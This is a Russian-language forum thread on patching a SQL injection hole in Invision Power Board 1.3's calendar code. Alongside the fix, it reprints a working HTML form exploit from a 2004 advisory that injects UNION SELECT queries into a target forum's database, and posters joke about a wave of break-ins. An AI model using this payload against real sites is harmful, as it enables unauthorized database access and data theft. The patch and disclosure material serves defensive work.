Перейти к контенту

Установка вручную патча безопасности №2


Рекомендуемые сообщения

Подробнее по самому патчу в теме:

Еше один патч безопасности для 1.3

 

Собственно установка патча состоит из замены 2 строк в файле sources/calender.php. В нем надо найти код:

$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon']  : $ibforums->input['m'];
$this->chosen_year  = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : $ibforums->input['y'];

И заменить его на:

$this->chosen_month = ( ! intval($ibforums->input['m']) ) ? $this->now_date['mon']  : intval($ibforums->input['m']);
$this->chosen_year  = ( ! intval($ibforums->input['y']) ) ? $this->now_date['year'] : intval($ibforums->input['y']);

 

Всё. Патч установлен. Безопасность повышена. Можно обмыть :D

P.S. Для тех, кто еще не устанавливал патч безопасности №1, сюда.

Ссылка на комментарий
Поделиться на других сайтах

А вот это эксплоит дырки.

 

5 января 2004

SQL инъекция в Invision Power Board

 

 

Программа: Invision Power Board 1.3 FINAL

 

Опасность: Высокая

 

Наличие эксплоита: Да

 

Описание: Уязвимость в проверке правильности входных данных обнаружена в Invision Power Board. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.

 

Уязвимость обнаружена в сценарии sources/calendar.php в параметре 'request'.

 

Пример/Эксплоит:

 

<html>

<head><title>

Invision Power Board Free 1.3 FINAL SQL Injection Problems

</title></head>

<body>

<form action='/index.php?act=calendar' method='post'

onsubmit="this.m.value='2 )) UNION

'+this.request.value+'#';this.action=this.url.value+this.action;">

<b>IPB directory URL :</b> <input type='text' size='45' name='url'

value='http://forum.target.com'><br><br>

<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request'

value='SELECT * FROM ibf_calendar_events'><br><br>

<u>Attention :</u> The request result MUST have this structure :<br><br>

INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,INT,INT,CHAR(2),INT,INT,

INT,INT,STR,STR<br><br>

<input type='hidden' name='y' value='2004'>

<input type='hidden' name='m'>

<input type='submit' value='Execute'>

</form>

<br><br><br>

<p align="right">A patch can be found on <a

href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>

For more informations about this exploit :

<a href="http://www.security-corporation.com/advisories-025.html"

target="_blank">

Security-Corporation.com</a></p>

</body>

</html>

 

http://www.securitylab.ru/41994.html

Ссылка на комментарий
Поделиться на других сайтах

Грустно, что эксплоит будет работать только под mySQL 4+

UNION SELECT под 3 версией не поддерживается

А так бы волна взломов прокатилась... :D

Ссылка на комментарий
Поделиться на других сайтах

MAFIA

После установки хака попробуй воспользоваться эксплойтом - вместо запроса форум выдаст ошибку в самом верху страницы, чего-то там про дату...

Ссылка на комментарий
Поделиться на других сайтах

  • 2 недели спустя...
А что такое эксплоит?

 

Это создание условий для программы при которых она выполняет нужный код, (для взлома или еще чего).

Ссылка на комментарий
Поделиться на других сайтах

Грустно, что эксплоит будет работать только под mySQL 4+

UNION SELECT под 3 версией не поддерживается

А так бы волна взломов прокатилась...

А что это тебе так грустно-то? Ты ж в команде IBR Team ;)

 

Что-то я сейчас как ни посмотрю - у многих хостеров дефолтом 4+ стоит..

Да и на выделенные сервера стали ставить - видимо, привыкли к мысли "раз давно разрабатывается - значит всё круто!".

Тьфу! :D

Ссылка на комментарий
Поделиться на других сайтах

  • 7 месяцев спустя...

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Ответить в этой теме...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.